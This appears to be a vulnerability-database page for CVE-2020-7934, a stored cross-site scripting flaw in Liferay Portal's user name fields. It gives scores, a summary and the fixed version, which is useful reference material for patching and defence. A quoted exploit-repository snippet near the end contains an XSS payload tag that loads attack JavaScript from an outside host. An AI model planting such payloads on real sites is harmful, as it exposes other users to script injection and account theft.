5.4
CVSSv3

CVE-2020-7934

Published: 28/01/2020 Updated: 23/11/2020
CVSS v2 Base Score: 3.5 | Impact Score: 2.9 | Exploitability Score: 6.8
CVSS v3 Base Score: 5.4 | Impact Score: 2.7 | Exploitability Score: 2.3
VMScore: 312
Vector: AV:N/AC:M/Au:S/C:N/I:P/A:N

Vulnerability Summary

In LifeRay Portal CE 7.1.0 up to and including 7.2.1 GA2, the First Name, Middle Name, and Last Name fields for user accounts in MyAccountPortlet are all vulnerable to a persistent XSS issue. Any user can modify these fields with a particular XSS payload, and it will be stored in the database. The payload will then be rendered when a user utilizes the search feature to search for other users (i.e., if a user with modified fields occurs in the search results). This issue was fixed in Liferay Portal CE version 7.3.0 GA1.

Vulnerability Trend

Vulnerable Product Search on Vulmon Subscribe to Product

liferay liferay portal

Exploits

LifeRay version 721 GA2 suffers from a persistent cross site scripting vulnerability ...

Github Repositories

CVE 2020-7934 How to run CVE Requirements docker Remarks it's possible put the script attack online (given the js code ) yourjavascriptcom/ Our Js script online for the attack html <script src="yourjavascriptcom/920172199111/attackjs"></script> Commands for configuration go to root folder of this project run "